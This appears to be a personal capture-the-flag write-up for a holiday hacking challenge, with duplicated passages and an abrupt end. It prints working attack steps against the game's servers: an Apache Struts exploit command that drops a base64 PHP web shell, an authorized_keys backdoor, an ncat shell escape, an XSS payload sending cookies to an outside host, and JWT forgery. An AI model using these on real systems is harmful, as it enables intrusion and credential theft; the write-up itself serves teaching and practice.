Just Copy/Pasted this from my write-up. I'm sick right now, after getting over an illness during the holiday. Probably plenty of typos and stuff. Finished it the night it was due.
Disappointed with myself this year. Didn't work on it as much as I did other challenges. Sick during holiday break. First with an infection I was taking antibiotics for. Then something else.
Reflected over past year. Brother died last year. He was young, so this was unexpected. Christmas was always his favorite time of year. Wasn't really close to him, but I still regret not spending time with him more often. You just feel like you have a long time, and then they're gone in the blink of an eye.
So my heart just wasn't in it this year. Hopefully this is good enough for now. Might add pics later and hope to solve the rest later.
Update: I'm adding pics and stuff. Feeling a little better. I just wanted to note, these challenges aren't necessarily as easy as people make them look in the write-ups. For example, I don't just know stuff. If I really want to learn stuff, I spend a lot of time looking stuff up. It's not easy at first, but you'd be amazed at how much knowledge you can accumulate just by looking things up and learning from others. Don't be discouraged by these write-ups. Be encouraged. If someone like me can do this, so can you. :) Click on any pictures that look small. They look much better in the pop up.
Terminals
1. Candy Cane Striper Terminal
https://unix.stackexchange.com/questions/157997/run-a-binary-owned-by-root-without- sudo
http://man7.org/linux/man-pages/man8/ld.so.8.html
Getting the Candy Cane Striper Up and Running
Log on and read the clue.
If you forget the clue after the screen fills up:
cat /etc/motd
Do a directory listing that shows hidden files and check permissions.
ls -la
The Candy Cane Striper can only be read and written by root, read by group, read by other.
Don’t despair. With binaries, you can run a binary owned by root without sudo by using a dynamic linker/loader, in which you have read, but not execute permissions.
elf@fa03be74d52a:~$ /lib64/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper
2. Linux Command Hijacking Terminal
Running ElfTalkd
Log on and read the clue.
Do a directory listing that shows hidden files to see what is in the current directory. ls -la
Unfortunately, this one executable as easy to find as the Candy Cane Striper executable.
find / -name elftalkd isn’t helpful either.
Find is usually ran out of /usr/bin/find, so using the command
/usr/bin/find / -name elftalkd
finds us our executable.
The executable runs out of:
/run/elftalk/bin/elftalkd
So, using the command
/run/elftalk/bin/elftalkd
we can run it.
3. Troublesome Process Terminal
use
ps aux
to look for the executable. It shows that 8 was the pid of the process. Then run:
/bin/kill -9 8
Disappointed with myself this year. Didn't work on it as much as I did other challenges. Sick during holiday break. First with an infection I was taking antibiotics for. Then something else.
Reflected over past year. Brother died last year. He was young, so this was unexpected. Christmas was always his favorite time of year. Wasn't really close to him, but I still regret not spending time with him more often. You just feel like you have a long time, and then they're gone in the blink of an eye.
So my heart just wasn't in it this year. Hopefully this is good enough for now. Might add pics later and hope to solve the rest later.
Update: I'm adding pics and stuff. Feeling a little better. I just wanted to note, these challenges aren't necessarily as easy as people make them look in the write-ups. For example, I don't just know stuff. If I really want to learn stuff, I spend a lot of time looking stuff up. It's not easy at first, but you'd be amazed at how much knowledge you can accumulate just by looking things up and learning from others. Don't be discouraged by these write-ups. Be encouraged. If someone like me can do this, so can you. :) Click on any pictures that look small. They look much better in the pop up.
Holiday Hack Challenge Banner |
Terminals
1. Candy Cane Striper Terminal
https://unix.stackexchange.com/questions/157997/run-a-binary-owned-by-root-without- sudo
http://man7.org/linux/man-pages/man8/ld.so.8.html
Getting the Candy Cane Striper Up and Running
Log on and read the clue.
If you forget the clue after the screen fills up:
cat /etc/motd
Do a directory listing that shows hidden files and check permissions.
ls -la
The Candy Cane Striper can only be read and written by root, read by group, read by other.
Don’t despair. With binaries, you can run a binary owned by root without sudo by using a dynamic linker/loader, in which you have read, but not execute permissions.
elf@fa03be74d52a:~$ /lib64/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper
Candy Cane Striper Solution |
Candy Cane Striper Up and Running |
2. Linux Command Hijacking Terminal
Running ElfTalkd
Log on and read the clue.
Do a directory listing that shows hidden files to see what is in the current directory. ls -la
Unfortunately, this one executable as easy to find as the Candy Cane Striper executable.
find / -name elftalkd isn’t helpful either.
Find is usually ran out of /usr/bin/find, so using the command
/usr/bin/find / -name elftalkd
finds us our executable.
The executable runs out of:
/run/elftalk/bin/elftalkd
So, using the command
/run/elftalk/bin/elftalkd
we can run it.
ElfTalkd Solution |
Elftalkd Running |
3. Troublesome Process Terminal
use
ps aux
to look for the executable. It shows that 8 was the pid of the process. Then run:
/bin/kill -9 8
Troublesome Process Solution |
Troublesome Process Not Running |
4. Train Startup
The train was compiled to run on an arm architecture.
file trainstartup
file -i trainstartup
This particular linux kernel is an x86 architecture.
uname -a
qemu-arm is an emulator used to run arm executables on an x86-64 architecture. So, simply typing:
qemu-arm ./trainstartup
runs the program.
5. IsIt42 Terminal
This one seems similar to library path hijacking in Windows. In other words, we exploit the order in which Linux looks for libraries. More information about this technique can be found at:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for- the-win
Note: This only works on c libraries. It does not work on user-defined functions.
First, read the goal of this terminal. The goal is to make the program always return 42. Then read the sample program.
cat isit42.c.un
The part that is returning a random integer is
return rand() % 4096;
rand() is a c library.
The person that commented the code gave a clue as to what to do because they said that the prototype for rand is: int rand(void);
A library must be written to run in place of the one in the isit42 program.
You may use vim or whatever editor you like. Nano is just one of them.
nano isit42test.c
Type the following:
int rand(void){
printf(“Highjacking rand() to return 42.\n”);
return 42;
}
Save the file.
Next, the shared library should be compiled. Make sure to add the -shared and -fPIC at the end, or it won’t make a shared library.
gcc isit42test.c -o isit42test -shared -fPIC
The train was compiled to run on an arm architecture.
file trainstartup
file -i trainstartup
This particular linux kernel is an x86 architecture.
uname -a
qemu-arm is an emulator used to run arm executables on an x86-64 architecture. So, simply typing:
qemu-arm ./trainstartup
runs the program.
Train Startup Solution |
Train Running |
5. IsIt42 Terminal
This one seems similar to library path hijacking in Windows. In other words, we exploit the order in which Linux looks for libraries. More information about this technique can be found at:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for- the-win
Note: This only works on c libraries. It does not work on user-defined functions.
First, read the goal of this terminal. The goal is to make the program always return 42. Then read the sample program.
cat isit42.c.un
The part that is returning a random integer is
return rand() % 4096;
rand() is a c library.
The person that commented the code gave a clue as to what to do because they said that the prototype for rand is: int rand(void);
A library must be written to run in place of the one in the isit42 program.
You may use vim or whatever editor you like. Nano is just one of them.
nano isit42test.c
Type the following:
int rand(void){
printf(“Highjacking rand() to return 42.\n”);
return 42;
}
Save the file.
Next, the shared library should be compiled. Make sure to add the -shared and -fPIC at the end, or it won’t make a shared library.
gcc isit42test.c -o isit42test -shared -fPIC
Now, the library that is desired to be loaded must be found before the actual c library
that the program is referencing is found. The isit42 program is also ran during this step.
LD_PRELOAD=“$PWD/isit42test” ./isit42
It should return 42.
This next part goes by pretty quickly. When you execute the program, with the library preloaded, you'll briefly see it state that it's "Returning 42!" or whatever you put in that printf statement in the library you made. That means you successfully highjacked the library. You should see it return 42. As long as you preload your library, it will always return 42.
6. Christmas Songs Data Analysis Terminal
There is a command line program that is often on Linux called sqlite3. It is used for analyzing databases.
sqlite3 christmassongs.db
To see the information about the tables in the databases, you can use the .tables command.
.tables
To see the information about the columns in the tables, you can use the .schema <table> command.
.schema songs
.schema likes
There are two tables in the database. In order to get the most liked song, we have to tell sqlite3 that we want to get information from both tables that is related to each other. In relational databases, we can get information from both tables that is related to each other by the use of primary keys and foreign keys. In this case, the songs.id is the primary key for the songs table. The songs.id is also a foreign key for the likes table. In the likes table, songs.id is known as songid.
So, part of our query will be “where songs.id=likes.songid”.
We use the . notation above to tell sqlite that we want the id column from the songs table, and the songid column from the likes tables.
Often, as a database grows, an entry may be put into the database more than one time. In this case, the song title may have been added more than once. The following puts all of the repeat titles into one line.
So, part of our query will be “group by songs.title”
As a result of the song title being added more than once, we will have to add the number of likes for that specific title together. We do this by using the “sum” function in sql.
LD_PRELOAD=“$PWD/isit42test” ./isit42
It should return 42.
Cat Sample Program |
Highjacking Rand() |
Compile New Library - LD Preload |
Hijacked Rand() Library |
6. Christmas Songs Data Analysis Terminal
Christmas Songs Terminal |
There is a command line program that is often on Linux called sqlite3. It is used for analyzing databases.
sqlite3 christmassongs.db
To see the information about the tables in the databases, you can use the .tables command.
.tables
To see the information about the columns in the tables, you can use the .schema <table> command.
.schema songs
.schema likes
Christmas Songs DB |
There are two tables in the database. In order to get the most liked song, we have to tell sqlite3 that we want to get information from both tables that is related to each other. In relational databases, we can get information from both tables that is related to each other by the use of primary keys and foreign keys. In this case, the songs.id is the primary key for the songs table. The songs.id is also a foreign key for the likes table. In the likes table, songs.id is known as songid.
So, part of our query will be “where songs.id=likes.songid”.
We use the . notation above to tell sqlite that we want the id column from the songs table, and the songid column from the likes tables.
Often, as a database grows, an entry may be put into the database more than one time. In this case, the song title may have been added more than once. The following puts all of the repeat titles into one line.
So, part of our query will be “group by songs.title”
As a result of the song title being added more than once, we will have to add the number of likes for that specific title together. We do this by using the “sum” function in sql.
So, part of our query will be sum(likes.like)
We would like to get the most liked song, so we order by the most liked song in descending order. We limit our query to 10, so that we only return the 10 most liked songs. We could limit it to one, but I wanted to make sure that the query was working as intended.
The full query is below:
select sum(likes.like),songs.id,likes.songid,songs.title from songs,likes where songs.id=likes.songid group by songs.title order by sum(likes.like) desc limit 10;
Looks like the Answer is Stairway to Heaven. We'll run the program "runtoanswer" to be sure.
First, exit out of sqlite3.
.quit
Now, run the program.
./runtoanswer
7. Web Log Terminal Challenge
The goal of this challenge was to analyze an apache access log to find the least
common browser. Fortunately, it is plain text, and has well defined delimiters, so if one
has a decent understanding of some Linux command line tools, it shouldn’t be tough. If
not, Google is your friend. There are many ways to solve this one, only a google search
away. Here is one way:
cat access.log | awk -F\" '{print $6}' | sort -n | uniq -c | sort -n | head -n 10
Broken down:
cat access.log | - means send the access log file into the next command.
awk -F\” ‘{print $6}; | - the delimiter in this log is a “ character. Separate each line into pieces indicated by this delimiter. I only want the 6th piece. The 6th piece is the user agent string. Send the 6th piece output to the next command.
sort -n | - sort the 6th piece by number of occurrences. Send that output to the next command.
uniq -c - I only want to see unique occurrences of the 6th piece. Send those to the next command.
sort -n | Sort the unique instances of the 6th piece by number of occurrences. Send that output to the next command.
head -n 10 - only show me the first 10 in the output. Since the default order that it is sorted is ascending, the first one of the list will be the least used user agent.
8. Shadow Restoration Challenge
Resources:
https://serverfault.com/questions/133229/what-is-the-shadow-group-used-for
man sudo - found a switch to run as a group. (I did this on another linux box. The game terminal wouldn't let me do it.)
We would like to get the most liked song, so we order by the most liked song in descending order. We limit our query to 10, so that we only return the 10 most liked songs. We could limit it to one, but I wanted to make sure that the query was working as intended.
The full query is below:
select sum(likes.like),songs.id,likes.songid,songs.title from songs,likes where songs.id=likes.songid group by songs.title order by sum(likes.like) desc limit 10;
Christmas Songs DB Query |
First, exit out of sqlite3.
.quit
Now, run the program.
./runtoanswer
Christmas DB Number 1 Song |
7. Web Log Terminal Challenge
Web Log Terminal |
cat access.log | awk -F\" '{print $6}' | sort -n | uniq -c | sort -n | head -n 10
Broken down:
cat access.log | - means send the access log file into the next command.
awk -F\” ‘{print $6}; | - the delimiter in this log is a “ character. Separate each line into pieces indicated by this delimiter. I only want the 6th piece. The 6th piece is the user agent string. Send the 6th piece output to the next command.
sort -n | - sort the 6th piece by number of occurrences. Send that output to the next command.
uniq -c - I only want to see unique occurrences of the 6th piece. Send those to the next command.
sort -n | Sort the unique instances of the 6th piece by number of occurrences. Send that output to the next command.
head -n 10 - only show me the first 10 in the output. Since the default order that it is sorted is ascending, the first one of the list will be the least used user agent.
After running cat access.log ... |
Web Terminal Challenge Answer |
Resources:
https://serverfault.com/questions/133229/what-is-the-shadow-group-used-for
man sudo - found a switch to run as a group. (I did this on another linux box. The game terminal wouldn't let me do it.)
The goal of this one is to restore the shadow file from a backup.
Fortunately, this user is a member of the sudo group. This can be found by running:
sudo -l
This user has the ability to run the find command. You can see that near the bottom where it says, "User elf may run the following commands..." It also says that the user can run it without a password. it says, "NOPASSWD". And that elf is a member of the shadow group. "(elf : shadow)".
If sudo find /etc/shadow.bak -exec cp {} /etc/shadow \; is used, the elf password is required. Unfortunately, that password is not known.
The sudo command can be used as another user or group. The password for any users is not known, so use the -g switch to use a group. The group in Linux responsible for password managment - as well as other things - is the shadow group. The following command works, without a password.
sudo -g shadow find /etc/shadow.bak -exec cp {} /etc/shadow \;
The {} is another way of saying, /etc/shadow.bak. One could actually use /etc/ shadow.bak in place of the {} and it will work just fine. Just simpler to use that {} syntax.
The command says, “Run as a member of the shadow group”, “Find the shadow backup.”, “Overwrite the shadow file with the shadow backup”.
After the shadow file is restored, the inspect_da_box program must be run to complete this terminal.
inspect_da_box
Holiday Hack Challenge Questions
Fortunately, this user is a member of the sudo group. This can be found by running:
sudo -l
Shadow Terminal |
This user has the ability to run the find command. You can see that near the bottom where it says, "User elf may run the following commands..." It also says that the user can run it without a password. it says, "NOPASSWD". And that elf is a member of the shadow group. "(elf : shadow)".
If sudo find /etc/shadow.bak -exec cp {} /etc/shadow \; is used, the elf password is required. Unfortunately, that password is not known.
The sudo command can be used as another user or group. The password for any users is not known, so use the -g switch to use a group. The group in Linux responsible for password managment - as well as other things - is the shadow group. The following command works, without a password.
sudo -g shadow find /etc/shadow.bak -exec cp {} /etc/shadow \;
The {} is another way of saying, /etc/shadow.bak. One could actually use /etc/ shadow.bak in place of the {} and it will work just fine. Just simpler to use that {} syntax.
The command says, “Run as a member of the shadow group”, “Find the shadow backup.”, “Overwrite the shadow file with the shadow backup”.
After the shadow file is restored, the inspect_da_box program must be run to complete this terminal.
inspect_da_box
Shadow File Successfully Restored |
Holiday Hack Challenge Questions
-
1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the
first page of The Great Book using a giant snowball. What is the title of that page?
The title of that page is About This Book.
- 2) Investigate the Letters to Santa application at https:// l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?
-
3) The North Pole engineering team uses a Windows SMB server for sharing
documentation and correspondence. Using your access to the Letters to Santa
server, identify and enumerate the SMB file-sharing server. What is the file server share name?
FileStor. For the record, I could log onto IPC$ as well. Just couldn’t get a directory listing. Seemed to let me change to another directory, though. Also, it gives a different error message when I try to write to the directory using “put” so it might be writable. FileStor gives NT_STATUS_ACCESS_DENIED opening remote file \test when I try to put test to it. IPC$ gives NT_STATUS_OBJECT_NAME_NOT_FOUND error when I try to put a test file to it.
SSH Port Forwarding to SMB Server |
SMB Protocol Via Browser |
Finder Asking Permission To Access Share |
Entering Alabaster's Creds to Access Share |
Selecting Share |
Contents of FileStor |
4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?
SSH Port Forwarding to Mail Server |
Setting Up Browser Proxy - Firefox |
E-Mail Showing Where Page 4 Was On the Mail Server. |
Mail Server - Page 4 - Rise of the Lollipop Guild |
Elves and Munchkins don’t like each other. They have a long-standing feud. It’s never been proven, but the Elves believe that the Munchkins have sent Munchkin Moles to the North Pole.
5) How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain, and what is your proof?
a) 8 infractions are required to be marked as naughty on Santa’s Naughty and Nice List. (The lowest amount of infractions I could find for a naughty person was 8).
b) The insider moles are: Bog Questrian, Bini Aru - these two are known because they were mentioned in the BOLO:Munchkin Mole Advisory.
Known Munchkin Moles |
c) The Abominable Snow Monster, AKA Bumble, is throwing the giant snowballs - a page of the great book states that he’s throwing the snowballs - however, he’s under the influence of something magical that he ate. (If one plays thorough the game, it's revealed that he is throwing snowballs as well.
Great Book Page 5 |
Game Reveal |
6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?
SSH Port Forwarding to EAAS |
ssh -L 9000:10.142.0.5:80 alabaster_snowball@l2s.northpolechristmastown.com
ssh -L 9001:10.142.0.13:80 alabaster_snowball@l2s.northpolechristmastown.com
7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces
(EMI) to monitor and control critical infrastructure assets. These systems serve many
uses, including email access and web browsing. Gain access to the EMI server through
the use of a phishing attack with your access to the EWA server. Retrieve The Great
Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?
I know from exploiting the e-mail server that one should probably use a DDE Injection in order to phish Alabaster Snowball to retrieve this page. It was hinted in some e-mails that Alabaster would click on any links in e-mails containing the words “gingerbread”, ”cookie,” and “recipe”. Shinny Upatree also gives the hint in the stocking talking about DDE. He also said that he reprimanded for a security violation and that Alabaster installs unnecessary software the EMI server all the time including Microsoft Office. DDE Injection can be done with Word, Excel, Outlook, Powerpoint - probably more stuff- but those are the products I've seen it done in articles.
Unfortunately, I couldn’t get any of my exploit
attempts to work. I’ll detail my attempts later in this write-up.
8) Fetch the letter to Santa from the North Pole Elf Database at http:// edb.northpolechristmastown.com. Who wrote the letter?
I just got into the edb/ldap server on the night that this was due, so I didn't get this one. I did get it afterwards though. I'm holding off on reading write-ups until I solve them. It was the Wizard of Oz. :)
I retrieved the np-auth token via XXS. I knew that I needed the np-auth item because of the web page source code. Click on the Support Link and find the XSS vulnerability. You can use a marker to test, or simply try to pop an alert.
It kept saying "Alert, Hacker" when I tried certain XSS payloads. I just played around with it a bit to find out what it was filtering on. An easier way would have been to check to see if there was any script that contained "Alert, Hacker!". It didn't take long to figure out what it was alerting on, though. It was just the word script. So, I'd have to try payloads that either obfuscated the word "script" or payloads that didn't contain the word script.
It won't let you put the marker in the Username and E-Mail because they have to be a certain format. So, put a valid username and e-mail in each text box and add the marker script to the message. Check the web page source code.
Looks like the Message part is vulnerable. When you look at the source code, that is where this is located.
Try filter evasion payloads until one pops an alert.
Now, change the payload so it dials back to you.
I had a script running that captures cookies, but as long as you have something that shows the request, you should be fine. The script just captures multiple cookies, or whatever I'm asking for - in this case np-auth. I just named it cookie catcher.php because I originally thought I needed a cookie. I only set it up this way because I wanted to be certain I didn't miss it. This script saves the cookies to a log that I can look at later.
I decoded the token using pyjwt. It didn’t have a key, so decoding it was as simple as adding ‘’ for the key. The decoded token looked kind of like ldap.
I cracked the secret using jwtcrack. It was ‘3lv3s’.
I then used py-jwt to forge a new token with the decoded token and changing the “expires” date.
9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?
Glenda The Good Witch. She wants to start a war between munchkins and elves so that she can profit from selling magic/spells to both sides.
L2S Server
This server was running Apache Struts, and was vulnerable to the exploit detailed here:
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with- publicly-released-exploit-code
Sparkle Redberry gave the hints for this challenge.
Always check the source of the webpage. The webpage indicated that there was another website. dev.northpolechristmastown.com.
The Dev Version shows that it's running Apache Struts.
I used the tool mentioned in the SANS Pen Testing Blog Post mentioned earlier to upload a web shell: CVE-2017-9805.py I named it struts_exploit.py so I would remember what it was way in the future.
python struts_exploit.py -u https://dev. northpolechristmastown.com/ orders.xhtml -c "/bin/echo 'PGh0bWw+ Cjxib2R5Pgo8Zm9ybSBtZXRob2Q9Ik dFVCIgbmFtZT0iPD9waHAgZWNobyBi YXNlbmFtZSgkX1NFUlZFUlsnUEhQX1 NFTEYnXSk7ID8+ Ij4KPGlucHV0IHR5cGU9IlRFWFQiIG 5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6 ZT0iODAiPgo8aW5wdXQgdHlwZT0iU1 VCTUlUIiB2YWx1ZT0iRXhlY3V0ZSI+ CjwvZm9ybT4KPHByZT4KPD9waHAKIC AgIGlmKCRfR0VUWydjbWQnXSkKICAg IHsKICAgICAgICBzeXN0ZW0oJF9HRV RbJ2NtZCddKTsKICAgIH0KPz4KPC9w cmU+ CjwvYm9keT4KPHNjcmlwdD5kb2N1bW VudC5nZXRFbGVtZW50QnlJZCgiY21k IikuZm9jdXMoKTs8L3NjcmlwdD4KPC 9odG1sPg==' > /var/www/html/quackquackhere. php"
That base64 is a web shell.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
Then you just visit the webpage with your shell file name tacked on the end and the command you want to run.
https://l2s.northpolechristmastown.com/quackquackhere.php?ls
I know from exploiting the e-mail server that one should probably use a DDE Injection in order to phish Alabaster Snowball to retrieve this page. It was hinted in some e-mails that Alabaster would click on any links in e-mails containing the words “gingerbread”, ”cookie,” and “recipe”. Shinny Upatree also gives the hint in the stocking talking about DDE. He also said that he reprimanded for a security violation and that Alabaster installs unnecessary software the EMI server all the time including Microsoft Office. DDE Injection can be done with Word, Excel, Outlook, Powerpoint - probably more stuff- but those are the products I've seen it done in articles.
SSH Port Forwarding To Mail Server |
Setting Up Proxy in Browser - Firefox |
Alabaster Hinting he will click on anything regarding gingerbread cookies. |
Tarpin McJinglehauser stating to be on the lookout for certain e-mails. |
Minty hinting that they may be vulnerable to DDE Injection. |
Alabaster pulling down the file using nc. |
Alabaster stating that he has nc installed to his $PATH. |
Alabaster stating that they have powershell. |
Shinny Upatree Reprimanded |
Shinny Upatree Unnecessary Software |
8) Fetch the letter to Santa from the North Pole Elf Database at http:// edb.northpolechristmastown.com. Who wrote the letter?
I just got into the edb/ldap server on the night that this was due, so I didn't get this one. I did get it afterwards though. I'm holding off on reading write-ups until I solve them. It was the Wizard of Oz. :)
I retrieved the np-auth token via XXS. I knew that I needed the np-auth item because of the web page source code. Click on the Support Link and find the XSS vulnerability. You can use a marker to test, or simply try to pop an alert.
EDB Server |
EDB Support Page |
EDB Source |
XSS Marker Script |
Message Vulnerable to XSS |
Try filter evasion payloads until one pops an alert.
Try Payloads Until One Pops an alert |
XSS Alert Success! |
<IMG SRC=# onerror=window.open("http://x.x.x.x/cookiecatcher.php?cookie="+document.cookie)>
I had a script running that captures cookies, but as long as you have something that shows the request, you should be fine. The script just captures multiple cookies, or whatever I'm asking for - in this case np-auth. I just named it cookie catcher.php because I originally thought I needed a cookie. I only set it up this way because I wanted to be certain I didn't miss it. This script saves the cookies to a log that I can look at later.
I decoded the token using pyjwt. It didn’t have a key, so decoding it was as simple as adding ‘’ for the key. The decoded token looked kind of like ldap.
Alabaster's JWT Token |
Blank Key |
Decoding Alabaster's JWT Token With PyJWT |
I cracked the secret using jwtcrack. It was ‘3lv3s’.
Cracking JWT Secret With jwtcrack |
I then used py-jwt to forge a new token with the decoded token and changing the “expires” date.
Forging Alabaster Snowball's JWT Token |
9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?
Glenda The Good Witch. She wants to start a war between munchkins and elves so that she can profit from selling magic/spells to both sides.
Glenda did it. Can't say I'm surprised. I always suspected she was up to no good. |
This server was running Apache Struts, and was vulnerable to the exploit detailed here:
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with- publicly-released-exploit-code
Sparkle Redberry gave the hints for this challenge.
Always check the source of the webpage. The webpage indicated that there was another website. dev.northpolechristmastown.com.
Dev Version of L2S |
The Dev Version shows that it's running Apache Struts.
Running Apache Struts |
python struts_exploit.py -u https://dev.
That base64 is a web shell.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
Then you just visit the webpage with your shell file name tacked on the end and the command you want to run.
https://l2s.northpolechristmastown.com/quackquackhere.php?ls
I found it easier to upload my public key into the authorized_keys file and log on via ssh
before I found the password. Unfortunately, logging in via ssh left me in a restricted
shell.
python struts_exploit.py -u https://dev. northpolechristmastown.com/ orders.xhtml -c "/bin/echo '<my pub key here>' >> /home/alabaster.snowball/.ssh/authorized_keys"
I'm not afraid of people having my public key. Now if I showed my private key, that would be another story. I'm reverting to a snap shot on that VM though. So the key won't be on there at any rate whether it's safe or not.
Then I could just ssh in, presenting my private key. Learned this in NetWars. :) Like so:
ssh -i <private key file> alabaster_snowball@l2s.northpolechristmastown.com
Escaping RBash
I tried using tee as detailed here: https://pen-testing.sans.org/blog/2017/12/06/a-spot- of-tee, to break out of rbash. I was unsuccessful.
I found out that I could do dot (.) sourcing to get around not being able to use /. to run a command. I still couldn’t get my script to run properly. I was probably trying a payload that wasn’t correct.
https://superuser.com/questions/176783/what-is-the-difference-between-executing-a-bash-script-vs-sourcing-it
Since I couldn’t get the tee method to work, I found another way to escape rbash. I looked at alabaster_snowball’s .bashrc file in his home directory and found the code that was restricting users to the directory I was in and the path to the programs I was able to run in the restricted shell.
cat /home/alabaster.snowball/.bashrc
So then I did “ls /usr/local/rbin” to see what programs I could use.
I’ve used ncat several times and remembered that I could execute
commands with it. So I tried ncat -l 59000 --exec “/bin/bash” &. Then I connected to my
listener by typing ncat 127.0.0.1 59000.
If you've ever dealt with ncat, sometimes it is hard to tell that there is a prompt there. It looks like a blank space, but if you type a commands, like cd .. and ls, it will show the output. I know I escaped because in rbash, you can't change directories.
From the escaped shell, I could observe what other users were doing by typing “/bin/ps aux”. Someone locked down the $PATH, so I had to resort to full path naming to run programs - also called absolute paths. I learned quite a bit by watching the other players and downloading some of their exploit attempts. I carefully examined the exploits. Out of the restricted shell, I could type /bin/cat /etc/hosts to find some machines around me. I also used nmap to scan the machines around the l2s server.
I found Alabaster Snowball’s password in the tomcat dev files.
From the hints, I realized that I didn’t actually have to do much on this box other than to use it as a pivot into the internal network.
ssh -L 9000:10.142.0.x:<port number I’m interested in here> alabaster.snowball@l2s.northpolechristmastown.com
SMB Server
After scanning the systems using the hint provided by Holly Evergreen, I found an SMB Server. smbclient, for whatever reason wouldn’t work for me. So, I instead used ssh forwarding to forward the ip of the smb server to my machine. I have the pics posted earlier - in the "Holiday Hack Questions" Section.
ssh -L 9000:10.142.0.7:445
I didn’t want to use port 445 because I would have to sudo.
My machine is a Mac, so I opened up a browser and typed smb://127.0.0.1:9000. Finder picked up that I wanted to open a share and prompted me if I wanted to open the share with Finder. So, I clicked OK. Then a login prompt popped up. I put in Alabaster
python struts_exploit.py -u https://dev.
Pub Key |
Then I could just ssh in, presenting my private key. Learned this in NetWars. :) Like so:
ssh -i <private key file> alabaster_snowball@l2s.northpolechristmastown.com
Escaping RBash
I tried using tee as detailed here: https://pen-testing.sans.org/blog/2017/12/06/a-spot- of-tee, to break out of rbash. I was unsuccessful.
I found out that I could do dot (.) sourcing to get around not being able to use /. to run a command. I still couldn’t get my script to run properly. I was probably trying a payload that wasn’t correct.
https://superuser.com/questions/176783/what-is-the-difference-between-executing-a-bash-script-vs-sourcing-it
Since I couldn’t get the tee method to work, I found another way to escape rbash. I looked at alabaster_snowball’s .bashrc file in his home directory and found the code that was restricting users to the directory I was in and the path to the programs I was able to run in the restricted shell.
cat /home/alabaster.snowball/.bashrc
Restricting Users to RBash |
So then I did “ls /usr/local/rbin” to see what programs I could use.
What Can I Execute In RBash? |
Escaped From RBash |
From the escaped shell, I could observe what other users were doing by typing “/bin/ps aux”. Someone locked down the $PATH, so I had to resort to full path naming to run programs - also called absolute paths. I learned quite a bit by watching the other players and downloading some of their exploit attempts. I carefully examined the exploits. Out of the restricted shell, I could type /bin/cat /etc/hosts to find some machines around me. I also used nmap to scan the machines around the l2s server.
I found Alabaster Snowball’s password in the tomcat dev files.
From the hints, I realized that I didn’t actually have to do much on this box other than to use it as a pivot into the internal network.
ssh -L 9000:10.142.0.x:<port number I’m interested in here> alabaster.snowball@l2s.northpolechristmastown.com
SMB Server
After scanning the systems using the hint provided by Holly Evergreen, I found an SMB Server. smbclient, for whatever reason wouldn’t work for me. So, I instead used ssh forwarding to forward the ip of the smb server to my machine. I have the pics posted earlier - in the "Holiday Hack Questions" Section.
ssh -L 9000:10.142.0.7:445
I didn’t want to use port 445 because I would have to sudo.
My machine is a Mac, so I opened up a browser and typed smb://127.0.0.1:9000. Finder picked up that I wanted to open a share and prompted me if I wanted to open the share with Finder. So, I clicked OK. Then a login prompt popped up. I put in Alabaster
Snowball’s credentials. They were username: alabaster_snowball; password:
stream_unhappy_buy_loss.
I obtained the BOLO - Munchkin Mole Report.docx, GreatBookPage3.pdf, MEMO - Password Policy Reminder.docx, Naughty and Nice List.csv, Naughty and Nice list.docx.
Mail Server
The nmap scan also revealed a mail server at 10.142.0.5. I tried reading e-mails and sending phishing e-mails by logging via telnet. Then I read the hints and found out that there might be an easier way in. So, I set up ssh forwarding, set my browser to use a proxy, and typed “10.142.0.5/robots.txt” into my browser. I looked at robots.txt and found a file that was disallowed. It was the source code for the cookie: cookie.txt.
The hints for this one were given by: Pepper Minstix. I found a useful resource that lets people test node.js modules in their browser called runkit + npm. I found the aes256 module and played around with it.
var aes256 = require(“aes256” 1.0.2)
var key = ‘santaisonabender’;
var encrypted = ‘AAAAAAAAAAAAAAAAAAAAAA’; var plaintext = ‘’;
console.log(encrypted);
var decrypted = aes256.decrypt(key, encrypted); console.log(decrypted);
if (decrypted === plaintext){
console.log(‘equal’);
}
I found out that the IV is completely dropped by this module. In the program, it’s aes256 encrypted and base64 encoded. So to decrypt, it would be base64 decoded and aes256 decrypted. 22 A’s are required because when 16 characters - the IV are base64 encoded, it’s drawn out to 22 characters. I played with base64 encoding to see what happens to come by that bit of information that 16 characters are padded out to 22.
The hints provided by Pepper Minstix hinted at changing the cookie. The code appeared as though it compared the plaintext variable in the decryption function to the plaintext value in the cookie. The plaintext variable in the decryption function’s value is gotten by passing the key and the ciphertext from the cookie to the decryption algorithm. If the ciphertext is 22 characters, those characters are dropped, leaving it blank. I’m not sure why it’s blank given that the key should still passed to the algorithm, but it worked, so I didn’t really question it. I would guess it’s the way that node.js handles undefined objects, but I’m not sure.
I changed the cookie in my browser, using Developer Tools in Firefox. I left the plaintext blank and put 22 A’s in the cipher text.
Then I looked at the response and saw /account.html. Typed in 10.142.0.5/account.html and I was logged into
